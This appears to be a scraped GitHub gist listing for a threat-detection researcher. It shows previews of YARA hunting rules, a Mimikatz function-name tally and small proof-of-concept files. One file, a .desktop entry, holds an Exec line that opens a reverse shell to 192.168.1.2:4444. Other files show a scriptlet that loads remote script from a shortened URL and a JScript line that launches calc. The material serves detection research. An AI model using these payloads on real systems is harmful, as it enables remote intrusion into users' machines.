I hereby claim:
- I am itsreallynick on github.
- I am itsreallynick (https://keybase.io/itsreallynick) on keybase.
- I have a public key ASDBI4S7vhTSnA-yeUaMckHjZTAVTcOo8qpkRA1h9UCz_wo
To claim this, I am signing this object:
itsreallynick
/ poké.txt
Created
September 10, 2020 02:16
Pokémon Challenge - Regex Capture Them All!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bulbasaur | |
| Ivysaur | |
| Venusaur | |
| Charmander | |
| Charmeleon | |
| Charizard | |
| Squirtle | |
| Wartortle | |
| Blastoise | |
| Caterpie |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule Hunting_InstallUtil_ProbablePayload | |
| { | |
| meta: | |
| author = "Nick Carr - @itsreallynick" | |
| description = "2019-05-22 - Focusing on the underlying structure that largely cannot change outside of obfuscation" | |
| strings: | |
| $installutil = "System.Configuration.Install" nocase ascii wide | |
| $override_func1 = "public override string HelpText" nocase ascii wide | |
| $override_func2 = "public override void Uninstall" nocase ascii wide | |
| $override_func3 = "public override void Install" nocase ascii wide |
itsreallynick
/ poc.desktop
Last active
October 28, 2019 03:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Desktop Entry] | |
| Name=GoShortcutItsYourEpoch | |
| Exec=/bin/bash -i >& /dev/tcp/192.168.1.2/4444 0>&1 | |
| Icon=http://bit.ly/icon-png | |
| Terminal=false | |
| Type=Application |
itsreallynick
/ dailyworkflow.yar
Created
October 24, 2019 14:39
Workflow.Compiler rules from August 2018
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Background: | |
| rule Hunting_Workflow_Collection_XOML { | |
| meta: | |
| author = "Nick Carr - @itsreallynick" | |
| strings: | |
| $workflow1 = "<SequentialWorkflowActivity" nocase ascii wide | |
| $workflow2 = "Code" nocase ascii wide | |
| condition: | |
| uint16(0) != 0x5A4D and all of ($workflow*) and new_file |
itsreallynick
/ gen_URLpersistence.yar
Last active
March 10, 2020 12:47
Yara rules for .url tricks that didn't fit in a tweet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule Methodology_Suspicious_Shortcut_Local_URL | |
| { | |
| meta: | |
| author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)" | |
| description = "Detects local script usage for .URL persistence" | |
| reference = "https://twitter.com/cglyer/status/1176184798248919044" | |
| strings: | |
| $file = "URL=file:///" nocase | |
| $url_clsid = "[{000214A0-0000-0000-C000-000000000046}]" | |
| $url_explicit = "[InternetShortcut]" nocase |
itsreallynick
/ mimistack
Created
December 19, 2018 04:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 143 function Invoke-Mimidogz | |
| 140 function Invoke-Mimikatz | |
| 29 function Invoke-Mimi | |
| 10 function Chokorun | |
| 7 function Invoke-Ttest | |
| 7 function Invoke-Mimiwormz | |
| 7 function Invoke-Me | |
| 6 function Invoke-Mimiturtle | |
| 6 function Invoke-Mimimi | |
| 5 function output |
itsreallynick
/ keybase.md
Created
August 27, 2018 13:31
itsreallynick
/ calc.lol
Created
February 26, 2018 15:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <component><script src="http://goo.gl/fxtJVt"></script></component> |
itsreallynick
/ itsreallycalc
Last active
February 22, 2018 20:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var itsreallycalc = new ActiveXObject("WScript.Shell").Run("calc.exe"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule help_Elm0d | |
| { | |
| meta: | |
| author = "@ItsReallyNick - Nick Carr" | |
| description = "We are STILL helping https://twitter.com/Elm0D find his files" | |
| reference = "https://twitter.com/ItsReallyNick/status/902702954272223232" | |
| strings: | |
| $elm0d = /[^a-z0-9]elm0d[^a-z0-9]/ nocase ascii wide | |
| $lol_infra = "iso9001-certificare.ro" nocase ascii wide | |
| $lol_website = "www.elm0d.tk" nocase ascii wide |
NewerOlder